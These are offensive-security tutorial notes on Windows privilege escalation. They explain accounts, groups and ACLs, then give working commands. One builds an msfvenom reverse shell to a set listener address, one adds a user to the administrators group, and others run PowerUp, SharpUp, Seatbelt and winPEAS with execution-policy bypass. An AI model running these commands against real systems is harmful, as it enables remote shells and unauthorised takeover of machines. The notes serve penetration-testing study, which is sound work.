| description |
|---|
Goal low priv -> Administrator or SYSTEM |
Our ultimate goal with privilege escalation in Windows is to gain a shell running as an Administrator or SYSTEM user.
Privilege escalation can be simple or require complete enumeration of the compromised system.
In a lot of cases, privilege escalation may require multiple misconfigurations in order to chain the perfect exploit.
All privilege escalations are effectively examples of access control violations.
Understanding how Windows handles permissions is paramount.
User accounts are used to log into a Windows system.
The local Administrator account is created by default.
Several other user accounts may exist such as Guest, krbtgt, etc.
Service accounts are used to run services in Windows.
Service accounts cannot be used to sign into a Windows system.
The SYSTEM account is a default service account which has the highest privileges of any local account in Windows.
Other service accounts include NETWORK SERVICE and LOCAL SERVICE.
User accounts can belong to multiple groups and groups can have multiple users.
Groups allow for easier access control to resources.
Regular groups have a set list of members.
Pseudo groups A.K.A. "Authenticated Users" have a dynamic list of members which changes based on certain interactions.
In Windows, there are multiple types of resource A.K.A. objects.
These include:
- Files/Directories
- Registry Entries
- Services
Whether a user/group has permission to perform a certain action on a resource depends on that resource's access control list (ACL).
Permissions to access a certain resource in Windows are controlled by the ACL for that resource.
Each ACL is made up of zero or more access control entries (ACEs).
Each ACE defines the relationship between a principal and a certain access right.
If we can execute commands with admin privileges, a reverse shell generated by msfvenom works the best.
Syntax:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f exe -o reverse.exe
- Transfer the reverse shell to the compromised host and then the shell can be caught with netcat or Metasploit's Meterpreter
Alternatively, if RDP is available (or if we enable it), we can add our low privileged user to the administrators group and then spawn an administrator command prompt via the GUI.
Syntax:
net localgroup administrators <username> /add
To escalate from an admin user to full SYSTEM privileges, you can use the PsExec tool.
These are very similar tools that look for specific misconfigurations that can grant an attacker privilege escalation.
How-To:
powershell -exec bypass
. .\PowerUp.ps1
Invoke-AllChecks
{% embed url="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1" %}
How-To:
.\SharpUp.exe
{% embed url="https://github.com/GhostPack/SharpUp" %}
This is an enumeration tool. It consists of checks but does not actively look for misconfigurations.
It simply aids in investigation/enumeration.
How-To:
.\Seatbelt.exe
.\Seatbelt.exe NonstandardServices
.\Seatbelt.exe All
{% embed url="https://github.com/GhostPack/Seatbelt" %}
.\winPEASany.exe -h
.\winPEASany.exe userinfo
{% embed url="https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS" %}